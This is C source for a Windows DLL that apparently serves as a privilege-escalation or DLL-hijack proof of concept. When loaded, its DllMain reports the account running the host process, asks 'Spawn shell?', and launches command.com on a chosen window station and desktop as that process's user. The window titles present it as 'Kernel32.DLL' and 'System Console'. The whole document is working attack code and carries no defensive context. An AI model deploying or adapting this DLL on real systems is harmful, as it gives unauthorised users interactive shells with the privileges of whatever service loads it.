#define _WIN32_WINNT 0x0400
#include<windows.h>

#define LOCKFILE "c:\\lockout"

BOOL CALLBACK EnumDTProc(LPSTR svDesk, LPARAM param)
{
	char svDT[1024];
	wsprintf(svDT,"On this desktop?\n%.256s",svDesk);
	if(MessageBox(NULL,svDT,"Desktop?", MB_ICONQUESTION | MB_YESNO | MB_SETFOREGROUND | MB_TOPMOST | MB_SERVICE_NOTIFICATION)==IDYES) {
		char svWSDT[1024];
		char svCommand[1024];
		lstrcpy(svWSDT,(LPSTR)param);
		lstrcat(svWSDT,"\\");
		lstrcat(svWSDT,svDesk);

		STARTUPINFO si;
		PROCESS_INFORMATION pi;
		memset(&si,0,sizeof(STARTUPINFO));
		si.cb=sizeof(STARTUPINFO);
		si.wShowWindow=SW_SHOW;
		si.lpDesktop=svWSDT;
		si.lpTitle="System Console";
		si.dwFlags=STARTF_USESHOWWINDOW;
	
		GetSystemDirectory(svCommand,1024);
		lstrcpyn(svCommand+lstrlen(svCommand),"\\command.com",1024-lstrlen(svCommand));

		if(CreateProcess(NULL,svCommand,NULL,NULL,TRUE,CREATE_NEW_CONSOLE | CREATE_SEPARATE_WOW_VDM,NULL,NULL,&si,&pi)==0) {
			MessageBox(NULL,"Could not create process.",svWSDT, MB_OK | MB_SETFOREGROUND | MB_TOPMOST | MB_SERVICE_NOTIFICATION);
			return TRUE;
		}
		HANDLE hfile;
		hfile=CreateFile(LOCKFILE,0,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
		if(hfile!=INVALID_HANDLE_VALUE) CloseHandle(hfile);
	}

	return TRUE;
}


BOOL CALLBACK EnumWSProc(LPSTR svName, LPARAM param)
{
	char svWS[1024];
	wsprintf(svWS,"On this window station?\n%.256s",svName);
	if(MessageBox(NULL,svWS,"Window Station?", MB_ICONQUESTION | MB_YESNO | MB_SETFOREGROUND | MB_TOPMOST | MB_SERVICE_NOTIFICATION)==IDYES) {
		HWINSTA hwinsta;
		hwinsta=OpenWindowStation(svName,TRUE,WINSTA_ENUMDESKTOPS | WINSTA_CREATEDESKTOP);
		if(hwinsta==NULL) {
			MessageBox(NULL,"Could not open window station.","Error", MB_OK | MB_SETFOREGROUND | MB_TOPMOST | MB_SERVICE_NOTIFICATION);
			return TRUE;
		}
		if(SetProcessWindowStation(hwinsta)==0) {
			MessageBox(NULL,"Could not set process window station.","Error", MB_OK | MB_SETFOREGROUND | MB_TOPMOST | MB_SERVICE_NOTIFICATION);
			return TRUE;
		}
		
		EnumDesktops(hwinsta, EnumDTProc, (LPARAM) svName);

		CloseHandle(hwinsta);
	}

	
	return TRUE;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	HANDLE hToken;

	if(fdwReason==DLL_PROCESS_ATTACH || fdwReason==DLL_THREAD_ATTACH) {
		HANDLE hFile;
		if((hFile=CreateFile(LOCKFILE,0,0,NULL,OPEN_EXISTING,0,NULL))!=INVALID_HANDLE_VALUE) {
			CloseHandle(hFile);
			return TRUE;
		}

		OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&hToken);
		
		TOKEN_USER *tok_user;
		DWORD dwLen;
		
		GetTokenInformation(hToken,TokenUser,NULL,0,&dwLen);
		tok_user=(TOKEN_USER *)GlobalAlloc(GMEM_FIXED,dwLen);
		GetTokenInformation(hToken,TokenUser,tok_user,dwLen,&dwLen);
		
		DWORD dwDomainLen;
		SID_NAME_USE snu;
		char svAccount[256],svDomain[256];
		dwLen=256;
		dwDomainLen=256;
		LookupAccountSid(NULL,tok_user->User.Sid,svAccount,&dwLen,svDomain,&dwDomainLen,&snu);

		char svMessage[1024];
		wsprintf(svMessage,"User is %s\\%s\nSpawn shell?",svDomain,svAccount);
		if(MessageBox(NULL,svMessage,"Kernel32.DLL loaded.",MB_YESNO|MB_SETFOREGROUND|MB_TOPMOST|MB_SERVICE_NOTIFICATION)==IDYES) {
			EnumWindowStations(EnumWSProc,0);
		}

		GlobalFree(tok_user);
		CloseHandle(hToken);
	}
	else {
//		MessageBox(NULL,"Kernel32.DLL unloaded.","Kernel32.DLL unloaded.",MB_OK|MB_SETFOREGROUND|MB_TOPMOST);
	}

	return TRUE;
}